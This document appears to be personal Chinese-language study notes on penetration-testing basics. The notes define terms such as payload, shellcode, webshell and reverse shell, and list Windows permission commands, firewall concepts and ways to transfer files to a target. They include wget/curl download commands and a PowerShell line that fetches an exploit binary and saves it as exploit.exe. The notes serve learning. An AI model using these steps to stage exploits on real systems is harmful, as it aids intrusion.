基础 操作系统和渗透名词
渗透名词
poc 概念验证 漏洞证明验证
exp 利用 利用系统漏洞进行攻击动作 唯一性
payload 有效载荷 在目标系统执行的代码和指令 (通道 )
shellcode shell代码 payload的一种 建立正向和反向的名字 (漏洞载荷的代码)
wehshell 网页后门
系统后门 软件后门
木马病毒 远程控制
病毒 破坏性程序
反弹 权限返回到ip上
回显
跳板 中介 a b c a通过b搞c b这就是跳板
黑白盒测试
黑 没有源代码 只要目标
白 啥都有 有源代码
社会工程学 对人的攻击
撞库 社工库撞库
att&ck 红蓝对抗框架
案例
按照案例
服务器 server liunx
个人pc win10
mac 比较少
常见命令
windows和liunx的
菜鸟 liunx教程
csdn 上搜windows
权限问题
文件权限 服务权限 用户权限
文件权限
这个文件权限是在权限用户中的
用户权限
windows的
可以在权限查看在控制面版
单个用户的权限
windows中 拒绝优先
第二种
命令
net user 查看用户权限
whoami 查看当前用户
管理员权限
普通用户
访客用户
组用户
在组里设置的权限在组里有效
>net localgroup 查看组
也可以在控制面板看
net localgroup Power Users 查看用户组
net user 用户名 查看用户所属组
防火墙权限
windows官方自带
liunx防火墙
第三方防火墙
出站
出战 无所谓
入站
严格
网站 https和http 直接入站和出战 一般防火墙上都允许
内网的时候 和主机 看到的防火墙才是真的防火墙
看防火墙 的应用
waf web应用防火墙
宝塔 安全狗 第三方 这个是专属于web的
技术
文件上传和下载 无界面
liunx
Linux:wget curl python ruby perl java 环境
网站
forum.ywhack.com/bountytips.php?pentest 棱角 知识库
演示
条件
搭建网站或者ftp (自己搭建 )
默认下载
默认
curl wget
下载
wget 网站路径 或者ip下载
curl 网站路径 -o 保存名字
windows的
forum.ywhack.com/bountytips.php?download windows的生成命令
powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe(地址文件) -OutFile exploit.exe"(导出名字 )
dir 查看当前文件
windows的执行
powershell
cmd
案例二 反弹shell作用---------有回显
回显就是显示命令执行不执行成功
交互式命令
passwd 账户 改密码